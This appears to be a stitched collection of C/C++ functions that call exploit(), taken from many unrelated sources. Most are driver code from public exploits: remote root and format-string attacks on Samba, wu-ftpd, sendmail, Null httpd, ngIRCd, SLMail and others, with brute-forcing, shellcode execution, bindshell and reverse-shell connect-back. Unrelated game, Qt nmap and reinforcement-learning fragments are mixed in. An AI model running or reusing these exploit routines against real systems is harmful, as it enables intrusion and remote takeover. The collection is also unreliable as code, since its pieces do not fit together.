void wrapper(void)
{
struct ctl_table *c;
fprintf(stderr,"exploit starting\n");
printf("making vsyscall page writable..\n\n");
exploit(off->set_memory_rw, VSYSCALL, verify_stage1);
printf("\nstage 1 completed\n");
sleep(5);
printf("registering new sysctl..\n\n");
c = (struct ctl_table *)(VSYSCALL+0x850);
memset((char *)(VSYSCALL+0x850), '\x00', 1952);
strcpy((char *)(VSYSCALL+0xf00),"hack");
memcpy((char *)(VSYSCALL+0xe00),"\x01\x00\x00\x00",4);
c->procname = (char *)(VSYSCALL+0xf00);
c->mode = 0666;
c->proc_handler = (void *)(off->proc_dostring);
c->data = (void *)(off->modprobe_path);
c->maxlen=256;
c->extra1 = (void *)(VSYSCALL+0xe00);
c->extra2 = (void *)(VSYSCALL+0xd00);
exploit(off->register_sysctl_table, VSYSCALL+0x850, verify_stage2);
printf("stage 2 completed\n");
}
int
main ( int argc, char* argv[] )
{
int s;
unsigned long cbip;
unsigned short cbport;
struct sockaddr_in remote_addr;
struct hostent* host_addr;
if ( argc != 2 )
if ( argc != 4 )
{ fprintf ( stderr, "Usage\n-----\n[bindshell] %s <ip>\n[reverseshell] %s <ip> <cbip> <cbport>\n", argv[0], argv[0] ); exit ( 1 ); }
if ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL )
{ fprintf ( stderr, "Cannot resolve hostname: %s\n", argv[1] ); exit ( 1 ); }
remote_addr.sin_family = AF_INET;
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
remote_addr.sin_port = htons ( PORT );
s = socket ( AF_INET, SOCK_STREAM, 0 );
printf ( "connecting to %s:%u...", argv[1], PORT );
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
{ printf ( "failed!\n" ); exit ( 1 ); }
printf ( "ok!\n" );
if ( argc == 4 )
{
cbip = inet_addr ( argv[2] ) ^ ( unsigned long ) 0x99999999;
cbport = htons ( atoi ( argv[3] ) ) ^ ( unsigned short ) 0x9999;
exploit ( s, cbip, cbport, 0 );
}
else
exploit ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 );
}
void wrapper(void)
{
struct ctl_table *c;
dprintf("[.] making vsyscall page writable...\n\n");
exploit(SET_MEMORY_RW, VSYSCALL, verify_stage1);
dprintf("[~] done, stage 1 completed\n");
sleep(5);
dprintf("[.] registering new sysctl...\n\n");
c = (struct ctl_table *)(VSYSCALL+0x850);
memset((char *)(VSYSCALL+0x850), '\x00', 1952);
strcpy((char *)(VSYSCALL+0xf00), SYSCTL_NAME);
memcpy((char *)(VSYSCALL+0xe00), "\x01\x00\x00\x00",4);
c->procname = (char *)(VSYSCALL+0xf00);
c->mode = 0666;
c->proc_handler = (void *)(PROC_DOSTRING);
c->data = (void *)(MODPROBE_PATH);
c->maxlen = 256;
c->extra1 = (void *)(VSYSCALL+0xe00);
c->extra2 = (void *)(VSYSCALL+0xd00);
exploit(REGISTER_SYSCTL_TABLE, VSYSCALL+0x850, verify_stage2);
dprintf("[~] done, stage 2 completed\n");
}
int main(char* argv[], int argc){
stuff();
if (argv[0] == "-x" || "-X") {
exploit();
return 1;
}
else if (argv[0] == "-b" || "-B") {
device_autoboot();
return 1;
}
else if (argv[0] == "-f" || "-F") {
device_upload(argv[1]);
return 1;
}
else {
printf("Command not found\n");
return -1;
}
}
void MainWindow::on_pushButton_3_clicked() //ler xml
{
QDomDocument documento;
QFile ficheiro(QApplication::applicationDirPath() + "/nmap/scan.xml");
//QMessageBox::information(this,"teste", QApplication::applicationDirPath() + "/scan.xml");
if(!ficheiro.open(QIODevice::ReadOnly | QIODevice::Text))
{
QMessageBox::critical(this,"Unable to read file","There was an error opening the XML file!");
}
else
{
if(!documento.setContent(&ficheiro))
{
QMessageBox::critical(this,"Parsing Error","Error while parsing the XML file information!");
}
ficheiro.close();
}
QDomElement raiz = documento.firstChildElement();
xmlRead(raiz,"port","portid",0);
xmlRead(raiz,"service","name",1);
xmlRead(raiz,"service","product",2);
xmlRead(raiz,"service","version",3);
exploit();
ui->tableWidget->resizeRowsToContents();
}
//This method executes the policy
pair<vector<float>,float> CDACN::policy(const Window &window)
{
if(uniform_real(engine)<exploration_rate_ or not window.full())
return explore();
else
return exploit(window);
}
/*
* OK here is how we brute force.
* We need to find two values... a valid chunk to free (our fake chunk)
* and the pvpbuf addr
* Since our fake chunk is repeated all over and is 4*5 bytes long,
* we have 5 possibilites of error in a sequencial search. We try for:
* chunk,chunk+4,chunk+8,chunk+12,chunk+16
*
* pvpbuf addr must be somewhere lower than ebp, specifically ebp + target.bufp (or else
* the exploit will fail since we cannot overwrite bufp. We start from bruteforcing ebp + target.bufp
* decreasing by 4 bytes
*
*/
void bruteforce(struct target_info target) {
int cincrease = 0; /* how many times we increased chunk value */
target.pvpbuf = target.ebp+target.bufp;
printf("Trying pvpbuf=0x%x\n",target.pvpbuf);
while(target.ebp - target.pvpbuf < 2000) { /* exploit will fail since pvpbuf < 2000 bytes */
if(exploit(target)) {
printf("Successfull exploitation with pvpbuf=0x%x and chunk=0x%x\n",target.pvpbuf,target.chunk);
return;
}
/* make sure it is a "usable" address ... start with a base of 0x0a since u have space untill 0xfe */
target.chunk+=4;
cincrease++;
if(cincrease > 4) {
target.chunk -= cincrease*4; /* start at initial value again */
cincrease =0;
target.pvpbuf -= 4;
printf("Trying pvpbuf=0x%x\n",target.pvpbuf);
}
}
printf("Bruteforce failed\n");
}
int
main (int argc, char * argv[])
{
int c;
unsigned long ret;
while((c=getopt (argc, argv, "ht:p:")) != EOF)
{
switch(c)
{
case 't': target = optarg; break;
case 'p': port = atoi (optarg); break;
case 'h': usage (argv[0]);
default : usage (argv[0]);
}
}
if (argc==1 || target == NULL)
usage (argv[0]);
fprintf (stdout, "\n [~] 0x333hate => samba 2.2.x remote root exploit [~]\n");
fprintf (stdout, " [~] coded by c0wboy ~ www.0x333.org [~]\n\n");
fprintf (stdout, " [-] connecting to %s:%d\n", target, port);
fprintf (stdout, " [-] stating bruteforce\n\n");
for (ret=START; ret>=STOP; ret-=OFFSET)
{
fprintf (stdout, " [-] testing 0x%x\n", ret);
hate (ret);
exploit ();
}
fprintf (stdout, " [-] uhm ... maybe samba is not vulnerable !\n");
return 0;
}
void Game::dealCards( Result *result, vector<string> &tefudaSet){
COUT<<"dc"<<endl;
//カードを配る
//tefudaSetで
//身分差があれば大富豪を起点、でなければ席順の若い人を起点
int target = players.convIDtoSekiNum( ( players.isInequality() ) ? players.mibunId(DAIFUGO) : players.sekijun[0]);//大富豪から
string suit = "SHDCJ";
string rank = "3456789XJQKA2R";
//プレイヤのカードを初期化してから
for(int i=0; i<players.size(); i++){
players.id[i].initCard();
}
for(int i=0; i<config.PLAYER_NUM; i++){
//一人一人に対して手札セットを割り当てていく
//cout << tefudaSet[i] << endl;
for(int j=0; j<tefudaSet[i].length()-1; j++){
if( tefudaSet[i][j] == ' ' ){
continue;
}
int s=-1, r=-1;
for(int k=0; k<5; k++){
//cout << suit[k] << " "<< tefudaSet[i][j] << endl;
if( suit[k] == tefudaSet[i][j]){
s = k;
break;
}
}
j++;//1つ進める
for(int k=0; k<14; k++){
//cout << rank[k] << " "<< tefudaSet[i][j] << endl;
if( rank[k] == tefudaSet[i][j]){
r = k;
break;
}
}
if( s < 0 || r < 0 ){
//cout << " ~~~~ " << endl;
exit(1);
}
if( s == 4){
players.id[players.sekijun[target]].cards[ 4 ][ 1 ] = 1;//入れて
}else{
//cout << s << " " << r << " " << suit[s] << " " << rank[r] << endl;
players.id[players.sekijun[target]].cards[ s ][ r+1 ] = 1;//入れて
}
players.id[players.sekijun[target]].cards_num++;//枚数を増やして
}
//次の人
target = ( target + 1 ) % ( players.size() );
}
//搾取が行われれば行う
exploit( result );
}
int
main ( int argc, char* argv[] )
{
int s, targ, i;
struct sockaddr_in remote_addr;
struct hostent* host_addr;
if ( argc != 2 )
{
printf ( "Usage: %s <ip>\n", argv[0] );
exit ( 1 );
}
system ( "clear" );
header ();
if ( !isip ( argv[1] ) )
{
printf ( "Invalid Target IP!\n" );
exit ( 1 );
}
printf("--[ select target\n");
for ( i = 0; i < 2; i++ )
printf ( "--[ %d [0x%08x] %s\n", target[i].num, target[i].ret, target[i].name );
printf ( " >> " );
scanf ( "%d", &targ );
if ( targ != 0 )
if ( targ != 1 )
{
printf ( "--[ invalid target!\n" );
exit ( 1 );
}
if ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL )
{
fprintf ( stderr, "cannot resolve \"%s\"\n", argv[1] );
exit ( 1 );
}
remote_addr.sin_family = AF_INET;
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
remote_addr.sin_port = htons ( PORT );
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
{
printf ( "socket failed!\n" );
exit ( 1 );
}
printf ( "--[ connecting to %s:%u...", argv[1], PORT );
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
{
printf ( "failed!\n" );
exit ( 1 );
}
printf ( "done!\n" );
if ( exploit ( s, target[targ].ret ) == 1 )
{
printf ( "exploitation FAILED!\n" );
exit ( 1 );
}
close ( s );
connect_to_bindshell ( argv[1], 4444 );
}
int
main (int argc,char *argv[])
{
char host[256];
int i,opt,type=0,port=80;
fprintf(stdout,"Null httpd 0.5.0 remote root exploit by eSDee of Netric\n");
fprintf(stdout,"--------------------------------------------------(www.netric.org)\n");
memset(host, 0x0, sizeof(host));
while((opt=getopt(argc,argv,"h:p:t:")) !=EOF)
{
switch(opt)
{
case 'h':
strncpy(host, optarg, sizeof(host) - 1);
break;
case 'p':
port=atoi(optarg);
if ((port <= 0) || (port > 65535)) {
fprintf(stderr,"Invalid port.\n\n");
return -1;
}
break;
case 't':
type=atoi(optarg);
if (type == 0 || type > sizeof(targets)/12) {
for(i = 0; i < sizeof(targets)/12; i++)
fprintf(stderr, "%d. %s\t (0x%08x - 0x%08x)\n",
i + 1,
targets[i].type,
targets[i].ret,targets[i].retloc);
fprintf(stderr, "\n");
return -1;
}
break;
default:
usage(argv[0]);
break;
}
}
if (strlen(host) == 0) usage(argv[0]);
if (!type) {
fprintf(stderr, "No target given, use -t0 for a list.\n\n");
return -1;
}
if (exploit(host, port, type) < 0) {
fprintf(stderr, "Failed.\n\n");
return -1;
}
return 0;
}
int main(int argc, char *argv[])
{
char opt, *system=NULL;
int shaddr=0, retaddr=0, targetnum=0, offset=0, i;
printf("\n nbSMTP v0.99 remote format string exploit\n");
printf(" by CoKi <*****@*****.**>\n\n");
while((opt = getopt(argc,argv,"r:s:t:lo:")) != EOF) {
switch (opt) {
case 'r':
retaddr = strtoul(optarg,NULL,0);
system = "unknown";
break;
case 's':
shaddr = strtoul(optarg,NULL,0);
break;
case 't':
targetnum = atoi(optarg)-1;
if(targets[targetnum].num) {
system = targets[targetnum].os;
retaddr = targets[targetnum].retaddr;
shaddr = targets[targetnum].shaddr;
}
else use(argv[0]);
break;
case 'l':
printlist();
break;
case 'o':
offset = atoi(optarg);
shaddr += offset;
break;
default:
use(argv[0]);
break;
}
}
if(retaddr == 0) use(argv[0]);
if(shaddr == 0) use(argv[0]);
if(system == NULL) {
system = "unknown";
}
printf(" [*] system\t\t\t: %s\n", system);
printf(" [*] return address\t\t: %010p\n", retaddr);
printf(" [*] shellcode address\t\t: %010p", shaddr);
fflush(stdout);
if(offset) printf(" (offset %d)\n", offset);
else printf("\n");
exploit(retaddr, shaddr);
}
int
main ( int argc, char* argv[] )
{
int s, option;
args myargs;
system ( "clear" );
header ();
parse_arguments ( argc, argv, &myargs );
s = connect_to_remote_host ( myargs.tip, myargs.tport );
printf ( "--[ select shellcode\n" );
printf ( " |\n" );
printf ( " |- [0] bind\n" );
printf ( " `- [1] cb\n" );
printf ( ">> " );
scanf ( "%d", &option );
switch ( option )
{
case 0:
printf ( "--[ using bind shellcode\n" );
if ( exploit ( s, target[myargs.target].smashaddr, target[myargs.target].writeaddr, NULL ) == 1 )
{
printf ( "exploitation failed!\n" );
exit ( 1 );
}
connect_to_bindshell ( myargs.tip, 20000 );
break;
case 1:
printf ( "--[ using cb shellcode\n" );
if ( exploit ( s, target[myargs.target].smashaddr, target[myargs.target].writeaddr, myargs.lip ) == 1 )
{
printf ( "exploitation failed!\n" );
exit ( 1 );
}
start_reverse_handler ( 45295 );
break;
default:
printf ( "--[ invalid shellcode!\n" ); exit ( 1 );
}
close ( s );
return 0;
}
int main() {
int size = strlen(shellcode);
void (*exploit)(void) = (void(*)(void))shellcode;
if(-1== mprotect((void*)((unsigned)shellcode&0xfffff000),0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)){
perror("mprotect"); printf("shellcode size = %d\n",size);
exit(-1);
}
exploit();
return 0;
}
int main(int argc, char **argv)
{
int sock = 0;
int data, port;
printf("\n[$] SLMail Server POP3 PASSWD Buffer Overflow exploit\n");
printf("[$] by Mad Ivan [ void31337 team ] - http://exploit.void31337.ru\n\n");
if ( argc < 2 ) { printf("usage: slmail-ex.exe <host> \n\n"); exit(0); }
port = 110;
sock = connect_target(argv[1], port);
exploit(sock);
closesocket(sock);
return 0;
}
void Game::dealCards( Result *result){
COUT<<"dc"<<endl;
//カードを配る
vector<int> deck;
//通常のカード
for(int i=0; i<4; i++){
for(int j=1; j<=13; j++){
deck.push_back( i*14 + j );
}
}
//jokerの枚数
for(int i=0; i<config.JOKER_NUM; i++){
deck.push_back( 14*4 + 1 );
}
//deckをshuffle
for(int i=0; i<deck.size()*2; i++){
int a = (int)( (deck.size()-1) * random->rand() );
int b = (int)( (deck.size()-1) * random->rand() );
int c = deck[a];
deck[a] = deck[b];
deck[b] = c;
}
//プレイヤのカードを初期化してから
for(int i=0; i<players.size(); i++){
players.id[i].initCard();
}
//deckを一枚ずつ分配していく
//身分差があれば大富豪を起点、でなければ席順の若い人を起点
int target = players.convIDtoSekiNum( ( players.isInequality() ) ? players.mibunId(DAIFUGO) : players.sekijun[0]);//大富豪から
while( !deck.empty() ){
players.id[players.sekijun[target]].cards[deck[0]/14][deck[0]%14] = 1;//入れて
players.id[players.sekijun[target]].cards_num++;//枚数を増やして
deck.erase( deck.begin() );//削除
//次の人
target = ( target + 1 ) % ( players.size() );
}
int tefuda[5][8][15]={{0}};
for(int i=0;i<players.size();i++){
copyCard( tefuda[i], players.id[i].cards );
}
result->setFirstCards( tefuda );
//搾取が行われれば行う
exploit( result );
}
int main(int argc, char **argv)
{
int sock_maxdb, sock_shell;
struct hostent *hn;
banner();
if (argc < 2) usage(argv[0]);
memset(&host, 0, sizeof(host));
host.sin_family = AF_INET;
host.sin_port = (argc > 2) ? htons((u_short)atoi(argv[2])) : htons(9999);
if ( (hn = gethostbyname(argv[1])) == NULL)
errx(-1, "Unresolvable address\n");
memcpy(&host.sin_addr, hn->h_addr, hn->h_length);
printf("[*] Connecting to %s:%d... ",
inet_ntoa(host.sin_addr), ntohs(host.sin_port));
fflush(stdout);
sock_maxdb = connect_port(ntohs(host.sin_port));
if (!sock_maxdb)
{
printf("failure.\n\n");
exit(-1);
}
printf("success.\n");
printf("[*] Sending evil payload...\n");
exploit(sock_maxdb);
close(sock_maxdb);
fflush(stdout);
sleep(1);
printf("[*] Trying to connect to spawned shell... ");
sock_shell = connect_port(13370);
if (!sock_shell)
{
printf("failure.\n\n");
exit(-1);
}
printf("success!\n\nEnjoy :)\n\n");
shell(sock_shell);
return 0;
}
int main(int argc, char **argv)
{
int cnt, sel;
char *offset;
long returnaddr;
if(argc == 1)
{
usage((char **)argv[0]);
exit(1);
}
while((cnt = getopt(argc,argv,"t:b:o:")) != EOF)
{
switch(cnt)
{
case 't': //target distro
sel = atoi(optarg);
exploit(target[sel-1].ret,(char **)target[sel-1].path);
break;
case 'b': //brute force
bruteforce((char **)target[sel-1].path);
break;
case 'o': //offset
offset = atoi(optarg);
returnaddr=esp()+offset;
sel = atoi(optarg);
exploit(returnaddr,(char **)target[sel-1].path);
break;
default:
usage(&argv[0]);
break;
}
}
return(0);
}
int main(int argc, char *argv[]) {
int t = 0;
int brute = 1;
int opt;
printf("Local sendmail 8.11.6 exploit by sorbo ([email protected])\n");
while( (opt = getopt(argc,argv,"t:bh")) != -1) {
switch(opt) {
case 't':
t = atoi(optarg);
if(t >= sizeof(targets)/sizeof(struct target_info)) {
printf("Invalid target %d\n",t);
exit(0);
}
brute = 0;
break;
case 'b':
brute = 1;
break;
case 'h':
default:
usage(argv[0]);
}
}
printf("Attempting to exploit %s\n",targets[t].description);
if(brute) {
bruteforce(targets[t]);
exit(0);
}
printf("pvpbuf=\t\t0x%x\n",targets[t].pvpbuf);
printf("zero=\t\t0x%x\n",targets[t].zero);
printf("chunk=\t\t0x%x\n",targets[t].chunk);
printf("shellcode=\t0x%x\n",targets[t].ret);
t = exploit(targets[t]);
if(t)
printf("Exploit successfull\n");
else
printf("Exploit failed... try adding -b\n");
exit(0);
}
void bruteforce(char **path)
{
pid_t pid;
int x=0, offset=5;
long ret;
printf("attemping brute force\n\n");
if(!getuid())
{
printf("brute force cannot be run while uid is 0\n");
exit(0);
}
ret=esp()+offset;
while(getuid()&&(x<=3000&&x>=-3000))
{
if((pid=fork())==0)
{
exploit(ret,path);
exit(0);
}
else perror("fork failed");
if(waitpid(pid,NULL, 0)!= pid) perror("waitpid error");
if(x>=3000)
{
ret=esp();
x=-1;
}
else if(x<=3000&&x>=0)
{
ret+=offset;
x+=offset;
}
else if(x>=-3000&&x<0)
{
ret-=offset;
x-=offset;
}
printf("%d\n\n",x);
}
printf("brute force complete..\n\n");
system("id");
}
int main(int argc,char **argv)
{
char code[1024];
unsigned int len;
*(int *)(shellcode+1)=(int) shell;
memset(code,NOP,1024);
len = 256;
printf("shellcode addr is:%p\nshell addr is %p\n",shellcode,shell);
sprintf(formatstrings,"%c%c%c%c%%%dp%%n",RETLOC&0x000000ff,(RETLOC&0x0000ff00)>>8,(RETLOC&0x00ff0000)>>16, (RETLOC&0xff000000)>>24,(int )shellcode -4);
printf("%s",formatstrings);
fflush(stdout);
memcpy(code,formatstrings,sizeof(formatstrings));
new_function(len,code);
exploit(len,code);
}
BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
{
BOOL bReturnValue = TRUE;
switch( dwReason )
{
case DLL_QUERY_HMODULE:
if( lpReserved != NULL )
*(HMODULE *)lpReserved = hAppInstance;
break;
case DLL_PROCESS_ATTACH:
hAppInstance = hinstDLL;
exploit();
ExitProcess(0);
break;
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
}
return bReturnValue;
}
int main(int ac, char **av)
{
int fd, pid, p, i;
char buf[TMPSIZE];
struct uids uids;
FILE *fp;
setpgrp();
setsid();
umask(022);
unlink(SHELL);
fd = open(SHELL, O_RDWR | O_CREAT | O_TRUNC, 0755);
fp = fdopen(fd, "w+");
fprintf(fp, "%s\n", shellcmd);
fclose(fp);
pid = getpid() + 2;
snprintf(buf, sizeof(buf) - 1, "/proc/%d/status", pid);
printf("\nModprobe pid %d, my pid %d", pid, getpid());
fflush(stdout);
signal(SIGUSR1, sighnd);
// fork modprobe helper
if (!(p = fork())) {
// some nice work for exec_usermodehelper(), keep it busy!
for (i = 0; i < FMAX; i++) {
fd = open("/dev/zero", O_RDWR);
mmap(NULL, MMSIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
}
kill(getppid(), SIGUSR1);
while (!sig);
printf("\nHelper (pid %d) requesting module...", getpid());
fflush(stdout);
fd = open(ENTRY, O_RDONLY | O_NONBLOCK);
exit(0);
}
// synchronize with the child
else {
while (!sig);
kill(p, SIGUSR1);
// wait for modprobe to run at unprivileged level
while (1) {
fd = open(buf, O_RDONLY);
if (fd > 0) {
if (!(fp = fdopen(fd, "r")))
fatal("fdopen");
if (get_ids(fp, &uids) != 4
|| (uids.uid != uids.euid || uids.uid != uids.suid
|| uids.uid != uids.fsuid)) {
fatal("did not catch modprobe...try again later :-)");
}
// ok, it runs...
while (1) {
if (ptrace(PTRACE_ATTACH, pid, NULL, NULL)) {
fatal("PTRACE_ATTACH failed!");
} else {
i = 0;
printf("\nAttached afterburner...\n");
fflush(stdout);
while (ptrace(PTRACE_GETREGS, pid, 0, ®s)
|| !regs.eip || regs.eip >= MAXSTACK) {
ptrace(PTRACE_SYSCALL, pid, NULL, NULL);
printf("\rplease wait %d", i++);
fflush(stdout);
}
waitpid(pid, NULL, WUNTRACED);
printf
("\nValid EIP found EIP=%p\nexploiting the bug, good luck... ",
regs.eip);
fflush(stdout);
exploit(pid);
exit(0);
}
}
fclose(fp);
}
}
}
return 0;
}
int
main (int argc, char *argv[])
{
char c;
char * progname; /* = argv[0] */
int fd;
tgt_type * tgt = NULL;
int tgt_num = -1;
unsigned char xpbuf[512 + 16];
fprintf (stderr, "7350wurm - x86/linux wuftpd <= 2.6.1 remote root "
"(version "VERSION")\n"
"team teso (thx bnuts, tomas, synnergy.net !).\n\n");
progname = argv[0];
if (argc < 2)
usage (progname);
while ((c = getopt (argc, argv, "hvaDmt:u:p:d:L:A:")) != EOF) {
switch (c) {
case 'h':
usage (progname);
break;
case 'a':
automode = 1;
break;
case 'D':
debugmode = 1;
break;
case 'v':
verbose += 1;
break;
case 'm':
mass = 1;
break;
case 't':
if (sscanf (optarg, "%u", &tgt_num) != 1)
usage (progname);
break;
case 'u':
username = "******";
printf ("username = %s\n", optarg);
break;
case 'p':
password = optarg;
break;
case 'd':
dest = optarg;
break;
case 'L':
if (sscanf (optarg, "0x%lx", &user_retloc) != 1)
usage (progname);
break;
case 'A':
if (sscanf (optarg, "0x%lx", &user_retaddr) != 1)
usage (progname);
break;
default:
usage (progname);
break;
}
}
/* if both required offsets are given manually, then we dont have
* to require a target selection. otherwise check whether the target
* is within the list. if its not, then print a list of available
* targets
*/
if (user_retloc != 0 && user_retaddr != 0) {
tgt = &tmanual;
} else if (automode == 0 && (tgt_num == 0 ||
tgt_num >= (sizeof (targets) / sizeof (tgt_type))))
{
if (tgt_num != 0)
printf ("WARNING: target out of list. list:\n\n");
tgt_list ();
exit (EXIT_SUCCESS);
}
if (tgt == NULL && automode == 0)
tgt = &targets[tgt_num - 1];
if (mass == 1) {
if ((argc - optind) == 0)
usage (progname);
mlen = sc_build_x86_lnx (mcode, sizeof (mcode),
x86_lnx_execve, &argv[optind]);
if (mlen >= 0xff) {
fprintf (stderr, "created argv-code too long "
"(%d bytes)\n", mlen);
exit (EXIT_FAILURE);
}
fprintf (stderr, "# created %d byte execve shellcode\n", mlen);
}
printf ("# trying to log into %s with (%s/%s) ...", dest,
username, password);
fflush (stdout);
fd = ftp_login (dest, username, password);
if (fd <= 0) {
fprintf (stderr, "\nfailed to connect (user/pass correct?)\n");
exit (EXIT_FAILURE);
}
printf (" connected.\n");
if (debugmode) {
printf ("DEBUG: press enter\n");
getchar ();
}
printf ("# banner: %s", (ftp_banner == NULL) ? "???" :
ftp_banner);
if (tgt == NULL && automode) {
tgt = tgt_frombanner (ftp_banner);
if (tgt == NULL) {
printf ("# failed to jield target from banner, aborting\n");
exit (EXIT_FAILURE);
}
printf ("# successfully selected target from banner\n");
}
if (shellcode == NULL) {
shellcode = tgt->shellcode;
shellcode_len = tgt->shellcode_len;
}
if (verbose >= 2) {
printf ("using %lu byte shellcode:\n", shellcode_len);
hexdump ("shellcode", shellcode, shellcode_len);
}
if (user_retaddr != 0) {
fprintf (stderr, "# overriding target retaddr with: 0x%08lx\n",
user_retaddr);
}
if (user_retloc != 0) {
fprintf (stderr, "# overriding target retloc with: 0x%08lx\n",
user_retloc);
tgt->retloc = user_retloc;
}
printf ("\n### TARGET: %s\n\n", tgt->desc);
/* real stuff starts from here
*/
printf ("# 1. filling memory gaps\n");
xp_gapfill (fd, RNFR_NUM, RNFR_SIZE);
exploit (fd, tgt);
printf ("# 3. triggering free(globlist[1])\n");
net_write (fd, "CWD ~{\n");
ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "sP");
if (strncmp (xpbuf, "sP", 2) != 0) {
fprintf (stderr, "exploitation FAILED !\noutput:\n%s\n",
xpbuf);
exit (EXIT_FAILURE);
}
printf ("#\n# exploitation succeeded. sending real shellcode\n");
if (mass == 1) {
printf ("# mass mode, sending constructed argv code\n");
write (fd, mcode, mlen);
printf ("# send. sleeping 10 seconds\n");
sleep (10);
printf ("# success.\n");
exit (EXIT_SUCCESS);
}
printf ("# sending setreuid/chroot/execve shellcode\n");
net_write (fd, "%s", x86_lnx_shell);
printf ("# spawning shell\n");
printf ("##################################################"
"##########################\n");
write (fd, INIT_CMD, strlen (INIT_CMD));
shell (fd);
exit (EXIT_SUCCESS);
}
int
main ( int argc, char* argv[] )
{
int s;
unsigned long xoredip;
unsigned short xoredcbport;
struct sockaddr_in remote_addr;
struct hostent *host_addr;
if ( argc != 2 )
if ( argc != 4 )
{
fprintf ( stderr, "\nUsage\n-----\n[ Bindshell ] %s <host>\n[ Reverseshell ] %s <host> <connectback ip> <connectback port>\n\n", argv[0], argv[0] );
exit ( 1 );
}
if ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL )
{
fprintf ( stderr, "cannot resolve \"%s\"\n", argv[1] );
exit ( 1 );
}
remote_addr.sin_family = AF_INET;
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
remote_addr.sin_port = htons ( PORT );
system ( "clear" );
header ();
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
{
printf ( "socket failed!\n" );
exit ( 1 );
}
printf ( "--[ connecting to %s:%u...", argv[1], PORT );
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
{
printf ( "failed!\n" );
exit ( 1 );
}
printf ( YELLOW "done!\n" NORMAL);
if ( argc == 4 )
{
xoredip = inet_addr ( argv[2] ) ^ ( unsigned long ) 0x99999999;
xoredcbport = htons ( atoi ( argv[3] ) ) ^ ( unsigned short ) 0x9999;
if ( exploit ( s, xoredip, xoredcbport, 0 ) == 1 )
{
printf ( "exploitation FAILED!\n" );
exit ( 1 );
}
start_reverse_handler ( argv[3] );
}
else
{
if ( exploit ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 ) == 1 )
{
printf ( "exploitation FAILED!\n" );
exit ( 1 );
}
connect_to_bindshell ( argv[1], 4444 );
}
}
int main(int argc, char **argv) {
exploit(argc, argv);
}
int main(int argc, char *argv[])
{
char opt, *host=NULL, *system=NULL, *ircd=NULL;
int i, ircdport=IRCD;
int retaddr=0x0806b000, gotaddr=0, targetnum=0, offset=0;
struct hostent *he;
printf("\n ngIRCd <= 0.8.2 remote format string exploit\n");
printf(" by CoKi <*****@*****.**>\n\n");
while((opt = getopt(argc,argv,"h:g:t:lo:bp:")) != EOF) {
switch (opt) {
case 'h':
host = optarg;
break;
case 'g':
gotaddr = strtoul(optarg,NULL,0);
system = "unknown";
ircd = "unknown";
break;
case 't':
targetnum = atoi(optarg)-1;
if(targets[targetnum].num) {
system = targets[targetnum].os;
ircd = targets[targetnum].ircd;
gotaddr = targets[targetnum].got;
}
else use(argv[0]);
break;
case 'l':
printlist();
break;
case 'o':
offset = atoi(optarg);
retaddr += offset;
break;
case 'b':
b = 1;
break;
case 'p':
ircdport = atoi(optarg);
break;
default:
use(argv[0]);
break;
}
}
if(host == NULL) use(argv[0]);
if(gotaddr == 0) use(argv[0]);
if(system == NULL) {
system = "unknown";
ircd = "unknown";
}
printf(" [*] host\t\t\t: %s\n", host);
printf(" [*] system\t\t\t: %s\n", system);
printf(" [*] ircd version\t\t: %s\n", ircd);
printf(" [*] syslog GOT address\t\t: %010p\n", gotaddr);
printf(" [*] verifying host\t\t:");
fflush(stdout);
if((he=gethostbyname(host)) == NULL) {
herror(" gethostbyname()");
printf("\n");
exit(1);
}
printf(" %s\n\n", inet_ntoa(*((struct in_addr *)he->h_addr)));
/* bruteforce mode */
if(b) {
for(i = retaddr; i <= 0x0806ffff; i += 0x10) {
printf(" [*] bruteforcing RET address\t: %010p", i);
fflush(stdout);
exploit(host, gotaddr, i, ircdport);
}
printf("\n [*] failed!\n\n");
}
/* single mode */
else {
printf(" [*] trying RET address\t\t: %010p", retaddr);
fflush(stdout);
if(offset) printf(" (offset %d)\n", offset);
else printf("\n");
exploit(host, gotaddr, retaddr, ircdport);
}
}
int main(int argc, char *argv[]) {
char opt, *host=NULL, *rh=NULL;
int sockfd;
unsigned int imapdport=IMAPD;
struct hostent *he;
struct sockaddr_in dest_dir;
printf("\n GNU Mailutils imap4d v0.6 remote format string exploit\n");
printf(" by CoKi <*****@*****.**>\n\n");
while((opt = getopt(argc,argv,"h:p:c:b:")) != EOF) {
switch (opt) {
case 'h':
host = optarg;
break;
case 'p':
imapdport = atoi(optarg);
break;
case 'c':
rhost = inet_addr(optarg);
rh = optarg;
cback++;
break;
case 'b':
rport = atoi(optarg);
break;
default:
use(argv[0]);
break;
}
}
if(host == NULL) use(argv[0]);
if(cback) {
printf(" [*] verifying your host\t:");
fflush(stdout);
if((he=gethostbyname(rh)) == NULL) {
herror(" gethostbyname()");
printf("\n");
exit(1);
}
shsize = strlen(conn_back);
conn_back[33]=(rhost & 0x000000ff);
conn_back[34]=(rhost & 0x0000ff00) >> 8;
conn_back[35]=(rhost & 0x00ff0000) >> 16;
conn_back[36]=(rhost & 0xff000000) >> 24;
conn_back[39]=(rport & 0xff00) >> 8;
conn_back[40]=(rport & 0x00ff);
printf(" %s\n", inet_ntoa(*((struct in_addr *)he->h_addr)));
printf(" [*] connect back port\t\t: %u\n", rport);
}
if(strlen(conn_back) < shsize) {
printf("\n [!] failed! your host or port contain null-bytes\n\n");
exit(1);
}
printf(" [*] verifying target host\t:");
